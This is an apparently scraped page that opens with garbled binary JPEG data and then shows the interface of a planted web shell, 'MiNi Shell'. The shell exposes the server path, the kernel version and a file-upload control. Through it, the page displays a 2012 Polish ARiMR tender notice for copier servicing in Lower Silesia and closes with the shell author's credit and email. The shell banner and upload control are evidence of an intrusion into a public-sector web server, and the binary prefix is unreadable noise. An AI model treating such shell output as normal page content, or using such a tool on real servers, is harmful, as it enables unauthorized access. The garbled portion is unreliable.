JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120402/102172-N-2012.html

<p class="kh_header"><b>Wrocław: świadczenie usług serwisu i konserwacji kopiarek Konica Minolta BIZHUB Dolnośląskiego Oddziału Regionalnego ARiMR i podległych Biur Powiatowych</b><br>
<b>Numer ogłoszenia: 102172 - 2012; data zamieszczenia: 02.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Dolnośląski Oddział Regionalny , ul. Giełdowa 8, 52-438 Wrocław, woj. dolnośląskie, tel. 71 3697400, faks 71 3643702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usług serwisu i konserwacji kopiarek Konica Minolta BIZHUB Dolnośląskiego Oddziału Regionalnego ARiMR i podległych Biur Powiatowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest serwis i konserwacja kopiarek Konica Minolta BIZHUB Dolnośląskiego Oddziału Regionalnego ARiMR i podległych Biur Powiatowych:

1.	Przedmiotem zamówienia jest serwis i konserwacja kopiarek Konica Minolta: BIZHUB 250 - 29 szt. i BIZHUB 350 - 2 szt., BIZHUB C 250 - 1 szt., BIZHUB C252 - 1 szt.
	Do zadań wykonawcy należeć będzie:
1.	Przeglądy konserwacyjne urządzeń wg wskazań producenta.
2.	Wymiana elementów podlegających wymianie w wyniku normalnej eksploatacji urządzeń wg wskazań producenta sprzętu lub komunikatów z urządzeń (wymiana na nowe, oryginalne elementy markowane logiem producenta urządzenia).
3.	Usuwanie awarii urządzeń (wszystkich awarii nie zaistniałych z winy użytkownika, np. awaria płyty głównej lub innego elementu elektronicznego).
4.	Aktualizacja oprogramowania kopiarek do aktualnych wersji (minimum raz w roku).
5.	Dostarczanie tonerów dla ww. kopiarek (tonery markowane logiem producenta urządzenia).
6.	Udzielanie wsparcia technicznego dla użytkowników przy obsłudze urządzeń (help desk).
7.	Zmiany konfiguracji urządzeń w trybie serwisowym na żądanie Zamawiającego.
8.	W przypadku braku możliwości usunięcia awarii urządzeń na miejscu dostarczenie urządzenia zastępczego na czas naprawy o parametrach nie niższych niż sprzęt użytkowany przez Zamawiającego.
9.	Diagnozowanie i wycena uszkodzeń innych niż określone w pkt. 3 (uszkodzenia z winy użytkownika).
10.	Wykonywanie comiesięcznego zestawienia wykonanych przez poszczególne urządzenia kopii w poszczególnych lokalizacjach w sposób niewymagający angażowania personelu Zamawiającego, np. przez zastosowanie modemu GSM/GPRS (CS Remote Care) lub OPS (Optimized Print Services). Rozliczenie kopii będzie stanowić załącznik do faktury wystawianej przez Wykonawcę co miesiąc.
11.	Wykonawca przekaże Zamawiającemu hasło i login umożliwiające obserwację i analizę zdarzeń w systemie wymienionym w pkt. 10.
12.	Oznaczenie, w widoczny i czytelny sposób, urządzeń Zamawiającego w formie naklejki z informacjami dot. sposobu zgłaszania awarii, usterek i/lub zapotrzebowania na materiały eksploatacyjne. Sposób zgłaszania awarii, usterek i/lub zapotrzebowania na materiały eksploatacyjne rozumiany jest jako: telefon i/lub faks i/lub e-mail.
13.	Po każdorazowej usłudze serwisowej Wykonawca wystawi Zamawiającemu protokół wykonania usługi - wzór protokołu wykonawca przedstawi Zamawiającemu z chwilą podpisania umowy i stanowić będzie jego integralną część.

2. Wykonawca, z którym zostanie podpisana umowa otrzyma aktualny wykaz urządzeń z ilością  wykonanych kopii .
3. Zamawiający wymaga zastosowania przez Wykonawcę oryginalnych części i materiałów eksploatacyjnych oznaczonych logo producenta sprzętu.
4. Zamawiający wymaga by Wykonawca dysponował minimum 3 pracownikami, którzy posiadają poświadczenie producenta sprzętu do wykonywania serwisu i konserwacji urządzeń będących przedmiotem zamówienia (należy dostarczyć wraz z ofertą).
5. Zamawiający wymaga od Wykonawcy wykazania się dokumentem będącym potwierdzeniem, iż jest autoryzowanym serwisem dla urządzeń Konica Minolta.
6. Zamawiający wymaga by w ciągu 24 godzin od zgłoszenia awarii/usterki urządzenia Wykonawca zajął się naprawą. W przypadku gdy czas naprawy urządzenia jest dłuższy niż 3 dni robocze Wykonawca zobowiązany jest do dostarczenia urządzenia zstępczego o parametrach nie gorszych niż urządzenia Zamawiającego. (za zgłoszenie należy również uznać alert z systemu CS Remote Care lub Optimized Print Services)
7. Raz w roku na żądanie Zamawiającego każde urządzenie może być bezpłatnie przewiezione do wybranej siedziby Biura Powiatowego lub Oddziału Regionalnego na terenie województwa dolnośląskiego. 

Poniżej wykaz lokalizacji w których znajdują się kopiarki.

Lp.	Biuro Powiatowe	Adres
1	Bolesławiec	59-700 Bolesławiec, ul. Komuny Paryskiej 38
2	Dzierżoniów	58-200 Dzierżoniów, Batalionów Chłopskich 19
3	Głogów	67-200 Głogów, ul. Sikorskiego 40
4	Góra	56 - 200 Góra, ul. Armii Polskiej 8
5	Jawor	59-400 Jawor, ul. Starojaworska 91
6	Jelenia Góra	58 - 500 Jelenia Góra, ul. Marcinka 33 a
7	Kamienna Góra	58 - 400 Kamienna Góra, ul. H. Sienkiewicza 6 a
8	Kłodzko	57-300 Kłodzko, ul. Harcerzy 6
9	Legnica	59-220 Legnica, ul. Bydgoska 18
10	Lubań	59-800 Lubań, ul. Karola Miarki 1
11	Lubin z siedzibą w Rudnej	59-305 Rudna ul. Ścinawska 19
12	Lwówek z siedzibą w Uboczu	59-620 Gryfów Śl., Ubocze 300
13	Milicz z siedzibą w Sławoszowicach	56-300 Sławoszowice, ul. Kolejowa 28, bud. B
14	Oleśnica z siedzibą w Sycowie	56-500 Syców, ul. Ogrodowa 10
15	Oława	55-200 Oława ul. Nowodojazdowa 9
16	Polkowice	59-100 Polkowice, ul. Spółdzielcza 2
17	Strzelin	57-100 Strzelin, ul. Kamienna 10
18	Środa Śląska	55- 300 Środa Śląska, ul. Wawrzyńca Korwina 2
19	Świdnica	58-100 Świdnica, ul. Saperów 25 b
20	Trzebnica	55-100 Trzebnica, ul. Milicka 23
21	Wałbrzych	58-306 Wałbrzych, ul. Uczniowska 21
22	Wołów	56-100 Wołów ul. Zaułek Zielony 20
23	Wrocław	50 - 452 Wrocław, ul. Komuny Paryskiej 72
24	Ząbkowice Śl.	57-200 Ząbkowice Śl., ul. Staszica 18
25	Zgorzelec	59-900 Zgorzelec ul. Bohaterów II Armii WP 8
26	Złotoryja z siedzibą w Pielgrzymce	59-524, Pielgrzymka 109a/1
27	Oddział Regionalny	52-438 Wrocław, ul. Giełdowa 8

	Dla celów poglądowych Zamawiający podaje ilość wykonanych przez poszczególne urządzenia 
kopii w okresie 12 miesięcy. 
Biuro	Nr Seryjny	Model	Aktualny licznik na dzień 01.03.2012 	ilość kopii wykonanych w ciągu 12 miesięcy**
BP001 Bolesławiec	21 447 724	BizHub250	211405	72 960
BP002 Dzierżoniów	21 437 107	BizHub250	115126	33 137
BP003 Głogów	21 447 969	BizHub250	109944	34 029
BP004 Góra	21 447 940	BizHub250	206344	33 307
BP005 Jawor	21 447 927	BizHub250	97485	31 500
BP006 Jelenia Góra	21 446 859	BizHub250	276941	93 479
BP007 Kamienna Góra	21 437 097	BizHub250	238576	44 050
BP008 Kłodzko	21 447 776	BizHub250	252115	46 866
BP008 Kłodzko	71 021 293	BizHub250	662869	87 146
BP009 Legnica	21 447 936	BizHub250	181222	35 779
BP010 Lubań	21 447 738	BizHub250	150363	50 367
BP011 Lubin	21 447 967	BizHub250	155847	24 657
BP012 Lwówek Śl.	21 447 634	BizHub250	293049	65 572
BP013 Milicz	21 448 084	BizHub250	212589	50 973
BP014 Olesnica	21 447 993	BizHub250	243375	86 701
BP015 Oława	21 447 998	BizHub250	165343	45 572
BP016 Polkowice	21 448 008	BizHub250	180670	29 952
BP017 Strzelin	21 447 555	BizHub250	229114	70 379
BP018 Środa Śl.	21 447 557	BizHub250	36652	9 281
BP019 Świdnica	21 438 331	BizHub250	164544	33 405
BP020 Trzebnica	21 447 574	BizHub250	76776	20 837
BP020 Trzebnica	21 102 345	BizHub250	192117	43 205
BP021 Wałbrzych	21 438 380	BizHub250	156141	29 887
BP022 Wołów	21 447 728	BizHub250	147097	43 174
BP023 Wrocław	30AF90018	BizHub350	177731	29 809
BP023 Wrocław	71 021 919	BizHub250	364721	32 985
BP024 Ząbkowice Śl.	21 437 093	BizHub250	148559	20 616
BP025 Zgorzelec	21 446 820	BizHub250	159629	49 864
BP026 Złotoryja	21 440 179	BizHub250	195879	46 987
OR01 Wrocław	21 405 946	BizHub350	268466	71929
BP011 Lubin	21 425 352	BizHub250	159261	38740
OR01 Wrocław	211 708 981	BizHubC250 cz-b	210546	43543
BP014 Oleśnica	216 717 498	BizHubC252 cz-b	16295 (611901*)	185429
OR01 Wrocław	211 708 981	BizHubC250 kolor	3625	1168
BP014 Oleśnica	216 717 498	BizHubC252 kolor	252 (54020*)	41630
Suma	 	 	 	1 678 915
* w trakcie naprawy został wyzerowany licznik urządzenia, właściwy przebieg urządzenia jest w nawiasie
** ilość kopii dla poszczególnych urządzeń nie jest wartością stałą jest to przykładowa ilość kopii jakie urządzenia wykonały w 2011 w 2012 roku ilość kopii może ulec zmianie.
			
Rozliczenia z Wykonawcą odbywać się będą w cyklach miesięcznych. Wykonawca wystawiać będzie jedną zbiorczą fakturę z podziałem za poszczególne rodzaje kopii a załącznikiem do faktury będzie szczegółowa specyfikacja z wykazem urządzeń w poszczególnych jednostkach Zamawiającego z ilością kopii wykonaną przez urządzenia będące przedmiotem umowy.

Wymaga się, aby Wykonawca uzyskał na swoją odpowiedzialność i ryzyko oraz na koszt własny wszelkie istotne informacje, które mogą być niezbędne do przygotowania oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.31.32.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenie posiadanych uprawnień przez pracowników wydane przez producenta sprzętu Konica Minolta. Minimum 3 pracowników.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy dot. posiadania pracowników posiadających niezbędne uprawnienia do wykonywania przedmiotu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany zawartej umowy w następujących przypadkach:
1.	działania siły wyższej lub wystąpienia stanu wyższej konieczności,
2.	zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe,
3.	zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,
4.	omyłek pisarskich lub błędów rachunkowych,
5.	mających na celu wyjaśnienie wątpliwości dotyczących treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
6.	jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego,
7.	innych zmian korzystnych dla Zamawiającego, w tym polegających na zmianie elementów zamówienia na elementy lepsze lub odpowiedniejsze, chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 52-438 Wrocław, ul. Giełdowa 8,  Dolnośląski Oddział Regionalny ARiMR, p. 106.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.04.2012 godzina 10:00, miejsce: 52-438 Wrocław, ul. Giełdowa 8, Dolnośląski Oddział Regionalny ARiMR, sekretariat, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com